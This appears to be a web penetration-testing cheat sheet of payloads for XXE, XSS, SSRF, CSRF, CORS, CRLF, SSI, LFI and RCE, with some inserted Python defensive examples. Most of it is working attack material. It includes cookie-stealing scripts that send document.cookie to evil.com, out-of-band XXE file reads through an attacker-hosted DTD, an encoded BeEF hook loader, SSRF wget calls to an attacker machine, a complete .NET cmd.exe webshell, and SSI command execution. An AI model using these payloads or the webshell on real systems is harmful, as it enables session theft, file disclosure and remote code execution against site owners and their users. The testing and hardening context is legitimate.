Web Fuzz
Word count 1227, 2025-08-27 12:33:48
A Comprehensive Guide to Web Security Testing Techniques
XXE (XML External Entity Injection) Testing Methods
Basic tests
- Test whether the XML is actually parsed:
<?xml version="1.0"?>
<!DOCTYPE a [<!ENTITY test "THIS IS A STRING!">]>
<methodCall><methodName>&test;</methodName></methodCall>
- Once parsing is confirmed, try reading a file:
<?xml version="1.0"?>
<!DOCTYPE a [<!ENTITY test SYSTEM "file:///etc/passwd">]>
<methodCall><methodName>&test;</methodName></methodCall>
- Read a file through the PHP stream wrapper:
<?xml version="1.0"?>
<!DOCTYPE a [<!ENTITY test SYSTEM "php://filter/convert.base64-encode/resource=index.php">]>
<methodCall><methodName>&test;</methodName></methodCall>
WebGoat test method
<?xml version="1.0"?>
<!DOCTYPE a [<!ENTITY test SYSTEM "file:///etc/passwd">]>
<comment><text>&test;</text></comment>
Out-of-band (OOB) tests
- Basic test:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "http://burp.collab.server" >]>
<foo>&xxe;</foo>
- Advanced out-of-band file read:
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE data [
<!ENTITY % file SYSTEM "file:///etc/lsb-release">
<!ENTITY % dtd SYSTEM "http://<evil attacker hostname>:8000/evil.dtd">
%dtd;
]>
<data>&send;</data>
- Read a file over FTP:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE a [<!ENTITY % asd SYSTEM "http://<evil attacker hostname>:8090/xxe_file.dtd">%asd;%c;]>
<a>&rrr;</a>
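Every XXE payload above, including the out-of-band variants, depends on a DOCTYPE that declares entities. The following added example (not from the original page) shows the server-side counterpart: a standard-library parser that refuses any document carrying a DTD before an entity can be declared or expanded. The sample documents are constructed here; `parse_without_dtd` and `is_rejected` are this example's own names.

```python
import xml.parsers.expat


class DtdNotAllowed(ValueError):
    pass


def parse_without_dtd(data: bytes) -> dict:
    """Parse `data` into {element: text}; refuse any document that has a DTD.

    expat only fetches external entities if an ExternalEntityRefHandler is
    installed, but internal entities would still expand, so the DOCTYPE is
    refused before either can happen.
    """
    result, stack = {}, []

    def start_doctype(name, system_id, public_id, has_internal_subset):
        raise DtdNotAllowed(f"DOCTYPE '{name}' is not allowed")  # fires first

    def start(name, attrs):
        stack.append(name)
        result.setdefault(name, "")

    def chars(text):
        if stack:
            result[stack[-1]] += text

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = start_doctype
    parser.StartElementHandler = start
    parser.CharacterDataHandler = chars
    parser.EndElementHandler = lambda name: stack.pop()
    parser.Parse(data, True)
    return result


def is_rejected(data: bytes) -> bool:
    """True when the document is refused because it declares a DTD."""
    try:
        parse_without_dtd(data)
    except DtdNotAllowed:
        return True
    return False


# Constructed samples: the page's first XXE probe and a benign XML-RPC call.
XXE_PROBE = (b'<?xml version="1.0"?>'
             b'<!DOCTYPE a [<!ENTITY test "THIS IS A STRING!">]>'
             b'<methodCall><methodName>&test;</methodName></methodCall>')
BENIGN = b'<methodCall><methodName>system.listMethods</methodName></methodCall>'
```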
XSS (Cross-Site Scripting) Testing Methods
Basic XSS tests
- Stored XSS:
'%uff1cscript%uff1ealert('XSS');%uff1c/script%uff1e'
- XSS via upload filenames:
.png
">.png
"><svg onmouseover=alert(1)>.svg
SVG XSS
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">alert('XSS!');</script>
</svg>
CSP bypass techniques
- Bypassing script-src 'self':
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
- Common payloads:
svg/onload
'-alert(1)-'
eval(atob('YWxlcnQoMSk='))
<iMg SrC=x OnErRoR=alert(1)>
<div onmouseover="alert('XSS');">
</Textarea/</Noscript/</Pre/</Xmp><Svg /Onload=confirm(document.domain)>
Credential theft
- Cookie theft:
- Blacklist bypass:
eval(atob('ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9ldmlsLmNvbTo4MDkwL3IucGhwP2M9Iitkb2N1bWVudC5jb29raWU='))
- Alternatives:
<script>new Image().src="http://evil.com:8090/b.php?"+document.cookie;</script>
<svg onload=fetch("//attacker/r.php?="%2Bcookie)>
SSRF (Server-Side Request Forgery) Testing
Basic tests
- Probing internal assets:
http://internal-server:22/notarealfile.txt
- Port scanning techniques:
- Infer whether a port is open from the response time
- Use DNSLOG for blind (no-echo) testing
- Ports to focus on:
- Common ports such as 80, 8080 and 443
Advanced techniques
- Path tests:
http://internal-vulnerable-server/rce?cmd=wget%20attackers-machine:4000&
http://internal-vulnerable-server/rce?cmd=wget%20attackers-machine:4000#
SQL Injection Testing
Test methods
- Test PUT requests with SQLMap:
sqlmap -r <file with request> -vvvv
- Double-encoded input tests
Session Fixation Testing
- Test steps:
- Visit the login page and record the unauthenticated user's session ID
- Log in
- Check whether the post-login session ID is the same as before
- If it is the same, the application is vulnerable to session fixation
CSRF (Cross-Site Request Forgery) Testing
Bypass techniques
- CSRF against JSON endpoints:
<html>
<script>
  function jsonreq() {
    var xmlhttp = new XMLHttpRequest();
    xmlhttp.open("POST", "https://target.com/api/endpoint", true);
    xmlhttp.setRequestHeader("Content-Type", "text/plain");
    xmlhttp.withCredentials = true;
    xmlhttp.send(JSON.stringify({"test": "x"}));
  }
  jsonreq();
</script>
</html>
- CSRF to XSS:
<html>
<body>
<p>Please wait... ;)</p>
<script>
  let host = 'http://target.com'
  let beef_payload = '%3c%73%63%72%69%70%74%3e%20%73%3d%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%27%73%63%72%69%70%74%27%29%3b%20%73%2e%74%79%70%65%3d%27%74%65%78%74%2f%6a%61%76%61%73%63%72%69%70%74%27%3b%20%73%2e%73%72%63%3d%27%68%74%74%70%73%3a%2f%2f%65%76%69%6c%2e%63%6f%6d%2f%68%6f%6f%6b%2e%6a%73%27%3b%20%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%27%68%65%61%64%27%29%5b%30%5d%2e%61%70%70%65%6e%64%43%68%69%6c%64%28%73%29%3b%20%3c%2f%73%63%72%69%70%74%3e'
  let alert_payload = '%3Cimg%2Fsrc%2Fonerror%3Dalert(1)%3E'
  function submitRequest() {
    var req = new XMLHttpRequest();
    req.open(<CSRF components>);
    req.setRequestHeader("Accept", "application/json");
    req.withCredentials = true;
    req.onreadystatechange = function () {
      if (req.readyState === 4) {
        executeXSS();
      }
    }
    req.send();
  }
  function executeXSS() {
    window.location.assign(host + '<URI with XSS>' + alert_payload);
  }
  submitRequest();
</script>
</body>
</html>
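The JSON-endpoint trick above works only because the endpoint accepts a body sent as `text/plain` (which needs no CORS preflight) and never looks at where the request came from. As an added example that is not part of the original page, here is the server-side pre-check that closes it, written in Python as a framework-neutral function; `ALLOWED_ORIGINS` and the sample header sets are constructed for the example.

```python
from typing import Mapping

ALLOWED_ORIGINS = {"https://app.example.com"}   # assumed first-party origin(s)


def csrf_check(method: str, headers: Mapping[str, str]) -> str:
    """Return "ok", or "reject: <reason>" for a state-changing request."""
    h = {k.lower(): v for k, v in headers.items()}
    if method.upper() in {"GET", "HEAD", "OPTIONS"}:
        return "ok"                      # safe methods carry no state change
    # A cross-site XHR/fetch can only send a body without preflight using a
    # "simple" type such as text/plain; demanding application/json forces the
    # preflight, which a non-permissive CORS policy then refuses.
    ctype = h.get("content-type", "").split(";")[0].strip().lower()
    if ctype != "application/json":
        return "reject: content-type must be application/json"
    # Browsers always attach Origin to cross-site POSTs; pin it to our own.
    origin = h.get("origin")
    if origin is None:
        # No Origin: same-origin in some browsers, or a non-browser client.
        # Sec-Fetch-Site (sent by current browsers) settles the ambiguity.
        if h.get("sec-fetch-site", "none") not in {"same-origin", "none"}:
            return "reject: cross-site request without Origin"
        return "ok"
    if origin not in ALLOWED_ORIGINS:
        return f"reject: origin {origin} not allowed"
    return "ok"


# Constructed headers: the page's text/plain XHR, the same with a JSON type,
# and a legitimate first-party client.
FORGED = {"Origin": "https://evil.example", "Content-Type": "text/plain",
          "Sec-Fetch-Site": "cross-site"}
FORGED_JSON = {"Origin": "https://evil.example",
               "Content-Type": "application/json", "Sec-Fetch-Site": "cross-site"}
LEGIT = {"Origin": "https://app.example.com",
         "Content-Type": "application/json; charset=utf-8",
         "Sec-Fetch-Site": "same-origin"}
```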
File Upload Vulnerability Testing
Test methods
- Create a large file to test upload size limits (macOS):
mkfile -n 10g temp_10GB_file
- Null-byte injection bypass:
filename="test.php%00.jpg"
CORS Misconfiguration Testing
PoC test
<!DOCTYPE html>
<html>
<body>
<center>
<h2>CORS POC Exploit</h2>
<div id="demo">
  <button type="button" onclick="cors()">Exploit</button>
</div>
<script>
  function cors() {
    var req = new XMLHttpRequest();
    req.onreadystatechange = function() {
      if (this.readyState == 4 && this.status == 200) {
        document.getElementById("demo").innerHTML = this.responseText;
      }
    }
    req.open("GET", "<site>", true);
    req.withCredentials = true;
    req.send();
  }
</script>
</body>
</html>
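The PoC above succeeds only when the server reflects the request's Origin into `Access-Control-Allow-Origin` while also sending `Access-Control-Allow-Credentials: true`. The added example below (not from the original page) places that weak pattern beside an allow-listed form, and includes the response-header check a tester applies to classify a target's answer; the allow-list and function names are this example's own assumptions.

```python
from typing import Optional

ALLOWED_ORIGINS = {"https://app.example.com", "https://admin.example.com"}


def reflecting_cors(origin: Optional[str]) -> dict:
    """The weak pattern the PoC relies on: echo whatever Origin arrived."""
    return {} if origin is None else {
        "Access-Control-Allow-Origin": origin,
        "Access-Control-Allow-Credentials": "true",
    }


def allowlisted_cors(origin: Optional[str]) -> dict:
    """Hardened form: exact-match the full origin against a fixed allow-list."""
    # No prefix/suffix/regex matching: "https://app.example.com.evil.example"
    # and the literal "null" origin must both fall through to {} here.
    if origin is None or origin not in ALLOWED_ORIGINS:
        return {}
    return {
        "Access-Control-Allow-Origin": origin,
        "Access-Control-Allow-Credentials": "true",
        "Vary": "Origin",   # stop caches serving one origin's answer to another
    }


def cors_exploitable(sent_origin: str, response_headers: dict) -> bool:
    """True if a page at `sent_origin` could read this response with cookies.

    That needs ACAO to equal the origin the tester sent (an attacker can also
    produce "null" via a sandboxed iframe) and ACAC to be true; browsers
    refuse "*" when credentials are requested, so that case is not exploitable.
    """
    h = {k.lower(): v.strip() for k, v in response_headers.items()}
    acao = h.get("access-control-allow-origin")
    creds = h.get("access-control-allow-credentials", "").lower() == "true"
    return creds and acao is not None and acao == sent_origin
```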
Heartbleed Testing
Test methods
- Using Nmap:
nmap -d --script ssl-heartbleed --script-args vulns.showall -sV -p <port> <target ip> --script-trace -oA heartbleed-%y%m%d
- Using the Python PoC script:
python heartbleed-poc.py <target> -p <target port> | less
Open Redirect Testing
Test methods
- Basic test:
data:text/html;base64,PHNjcmlwdD4gcz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTsgcy50eXBlPSd0ZXh0L2phdmFzY3JpcHQnOyBzLnNyYz0naHR0cDovL2V2aWwuY29tOjMwMDAvaG9vay5qcyc7IGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdoZWFkJylbMF0uYXBwZW5kQ2hpbGQocyk7IDwvc2NyaXB0Pg==
- Other payloads:
http://;URL=javascript:alert('XSS')
data:text/html%3bbase64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K
CRLF Injection Testing
Test methods
- Basic test:
http://inj.example.org/redirect.asp?origin=foo%0d%0aSet-Cookie:%20ASPSESSIONIDACCBBTCD=SessionFixed%0d%0a
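The payload above lands an extra `Set-Cookie` line only if the decoded `origin` parameter is concatenated straight into the `Location` header. As an added example that is not part of the original page, the code below shows that weak pattern next to a hardened version that rejects any value containing CR, LF or NUL before it can reach a header; the function names are this example's own.

```python
from urllib.parse import unquote


class HeaderInjection(ValueError):
    """Raised when a value destined for a response header contains CR/LF/NUL."""


def naive_header_block(raw_origin: str) -> list:
    """Weak pattern: the decoded parameter goes straight into the header.

    Splitting on CRLF the way an HTTP client would reveals the smuggled line.
    """
    return ("Location: " + unquote(raw_origin)).split("\r\n")


def safe_header_value(raw: str) -> str:
    """Decode `raw` and return it only if it is a valid single-line field value."""
    value = unquote(raw)
    # RFC 9110 field values never contain CR, LF or NUL. Reject rather than
    # strip, so a tampered request fails loudly instead of partly succeeding.
    if any(ch in value for ch in "\r\n\0"):
        raise HeaderInjection("control character in header value")
    return value


def hardened_header_block(raw_origin: str) -> list:
    """Hardened form: validate before the value can reach the header.

    Note this only stops header injection; whether the redirect target itself
    is an allowed URL (the open-redirect question) is a separate check.
    """
    return ["Location: " + safe_header_value(raw_origin)]


def is_blocked(raw_origin: str) -> bool:
    """True when the hardened form refuses the value."""
    try:
        hardened_header_block(raw_origin)
    except HeaderInjection:
        return True
    return False


# The page's payload (copied here as a constructed sample) and a benign value.
PAYLOAD = "foo%0d%0aSet-Cookie:%20ASPSESSIONIDACCBBTCD=SessionFixed%0d%0a"
BENIGN = "https://example.com/home"
```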
Template Injection Testing
AngularJS test
<html>
<head>
  <meta charset="utf-8">
  <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.6.0/angular.js"></script>
</head>
<body>
  <div ng-app>{{constructor.constructor('alert(1)')()}}</div>
</body>
</html>
RCE (Remote Code Execution) Testing
.NET Webshell
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
  void Page_Load(object sender, EventArgs e) {}
  string executeIt(string arg) {
    ProcessStartInfo psi = new ProcessStartInfo();
    psi.FileName = "cmd.exe";
    psi.Arguments = "/c " + arg;
    psi.RedirectStandardOutput = true;
    psi.UseShellExecute = false;
    Process p = Process.Start(psi);
    StreamReader stmrdr = p.StandardOutput;
    string s = stmrdr.ReadToEnd();
    stmrdr.Close();
    return s;
  }
  void cmdClick(object sender, System.EventArgs e) {
    Response.Write("<pre>");
    Response.Write(Server.HtmlEncode(executeIt(txtArg.Text)));
    Response.Write("</pre>");
  }
</script>
<HTML>
<HEAD><title>REALLY NICE</title></HEAD>
<body>
<form id="cmd" method="post" runat="server">
  <asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
  <asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="execute" OnClick="cmdClick"></asp:Button>
  <asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
</form>
</body>
</HTML>
PHP anonymous function RCE
$inputFunc = function() use($a, $b, $c, &$f){echo(exec('whoami'));};
CSV Injection Testing
Excel CSV injection
=cmd|'cmd'!''
Server-Side Include (SSI) Injection Testing
Test payloads
<!--#printenv -->
<!--#exec cmd="cat /etc/passwd"-->
<pre><!--#exec cmd="ls" --></pre>
<pre><!--#echo var="DATE_LOCAL" --> </pre>
<pre><!--#exec cmd="whoami"--></pre>
<pre><!--#exec cmd="dir" --></pre>
Clickjacking Testing
PoC test
<html>
<head>
  <title>Clickjack test page</title>
</head>
<body>
  <p>Website is vulnerable to clickjacking!</p>
  <iframe src="http://target.com" width="500" height="500"></iframe>
</body>
</html>
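The PoC page above needs a visual check; the same answer can be read off the response headers. This added example (not from the original page) evaluates the two headers that govern framing, giving CSP `frame-ancestors` precedence over `X-Frame-Options` as browsers do; the sample header sets are constructed, and host-source wildcards in CSP are deliberately not modelled.

```python
def csp_frame_ancestors(csp: str):
    """Return the frame-ancestors source list (lower-cased), or None if absent."""
    for directive in csp.split(";"):
        tokens = directive.strip().split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            return [t.lower() for t in tokens[1:]]
    return None


def framing_allowed(headers: dict, page_origin: str, framer_origin: str) -> bool:
    """True if a document served from `framer_origin` may iframe this response."""
    h = {k.lower(): v for k, v in headers.items()}
    sources = csp_frame_ancestors(h.get("content-security-policy", ""))
    if sources is not None:          # CSP frame-ancestors overrides X-Frame-Options
        if "'none'" in sources:
            return False
        for src in sources:
            if src == "*" or src == framer_origin:
                return True
            if src == "'self'" and framer_origin == page_origin:
                return True
        return False                 # only the listed origins may frame the page
    xfo = h.get("x-frame-options", "").strip().lower()
    if xfo == "deny":
        return False
    if xfo == "sameorigin":
        return framer_origin == page_origin
    # Header absent, or a value current browsers ignore (e.g. obsolete ALLOW-FROM):
    # nothing stops the PoC's iframe from loading the page.
    return True


# Constructed responses for the check (the PoC above frames http://target.com).
NO_HEADERS = {}
XFO_DENY = {"X-Frame-Options": "DENY"}
CSP_SELF = {"Content-Security-Policy": "default-src 'self'; frame-ancestors 'self'"}
CSP_WINS = {"X-Frame-Options": "SAMEORIGIN",
            "Content-Security-Policy": "frame-ancestors 'none'"}
```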
JSON Parameter Testing
Test methods
- Mark the parameters in Burp and run an active scan
Deserialization Vulnerability Testing
Test tools
- Java Deserialization Scanner Burp extension
- Java Serialized Payloads Burp extension
- ysoserial
JWT (JSON Web Tokens) Testing
Test methods
- Capture a request with the Burp extension
- Send it to Repeater
- Open the JSON Web Tokens tab
- Sign with a random key pair
- Choose an attack under Alg None Attack
- Check whether the session is still valid
LFI (Local File Inclusion) Testing
Test methods
- Basic file inclusion:
http://target.com/page.php?file=../../../../etc/passwd
Subdomain Discovery Techniques
Common methods
- DNS enumeration tools
- Certificate Transparency log queries
- Search engine queries
- Brute-forcing common subdomain names
Useful Scripts
Site availability monitor
while true; do
/usr/bin/wget "http://[target]/uri/path" --timeout 30 -O - 2>/dev/null | grep "[item on page]" || echo "The site is down";
sleep 10;
done
IDOR (Insecure Direct Object Reference) Testing
Test methods
- Modify the object ID parameter
- Test horizontal access control
- Test vertical access control
The above is a comprehensive technical guide to web security testing, covering test methods and techniques for many common vulnerability classes, from XXE and XSS to SSRF and CSRF. In real-world testing, choose the methods that fit the target system, and carry out security testing lawfully and in compliance with the applicable rules.